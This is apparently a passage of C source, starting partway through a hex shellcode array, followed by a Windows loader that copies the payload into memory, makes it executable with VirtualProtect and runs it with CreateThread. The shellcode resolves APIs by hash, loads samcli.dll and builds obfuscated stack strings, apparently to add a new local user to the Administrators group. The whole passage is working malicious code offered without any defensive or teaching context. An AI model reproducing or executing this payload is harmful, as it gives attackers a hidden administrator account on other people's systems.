"\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04"
"\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18"
"\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b\x34\x88\x01\xde\x31"
"\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75"
"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8"
"\x89\x44\x24\x1c\x61\xc3\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e"
"\x0e\xec\xff\x55\x04\x89\x45\x14\x31\xc0\x50\x66\xb8\x6c\x6c\x50\x68\x6c\x69\x2e"
"\x64\x68\x73\x61\x6d\x63\x54\xff\x55\x14\x89\xc3\x68\x5e\xdf\x7c\xcd\xff\x55\x04"
"\x89\x45\x1c\x68\xd7\x3d\x0c\xc3\xff\x55\x04\x89\x45\x20\x31\xc0\x31\xdb\x43\x50"
"\xba\x8e\xff\x8c\xff\xf7\xda\x52\xba\x8c\xff\x90\xff\xf7\xda\x52\xba\x8e\xff\x9e"
"\xff\xf7\xda\x52\xba\x8d\xff\x8b\xff\xf7\xda\x52\xba\x92\xff\x96\xff\xf7\xda\x52"
"\xba\x93\xff\x96\xff\xf7\xda\x52\xba\xbf\xff\x9b\xff\xf7\xda\x52\x89\x65\x24\x50"
"\xba\x8a\xff\x96\xff\xf7\xda\x52\xba\x88\xff\x9e\xff\xf7\xda\x52\x89\xe1\x89\x4d"
"\x28\x50\xba\xcb\xff\xde\xff\xf7\xda\x52\xba\xcd\xff\xcb\xff\xf7\xda\x52\xba\xcf"
"\xff\xcd\xff\xf7\xda\x52\xba\x9b\xff\x8d\xff\xf7\xda\x52\xba\x93\xff\x92\xff\xf7"
"\xda\x52\xba\xad\xff\x8a\xff\xf7\xda\x52\x89\xe2\x50\x53\x50\x50\x53\x50\x52\x51"
"\x89\xe1\x50\x54\x51\x53\x50\xff\x55\x1c\x8b\x4d\x28\x51\x89\xe1\x53\x51\x6a\x03"
"\xff\x75\x24\x50\xff\x55\x20\x31\xc0\x50\xff\x55\x10";
unsigned int payload_len = 373;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec_mem, payload, payload_len);
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("Shellcode Length: %d\n", strlen(payload));
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}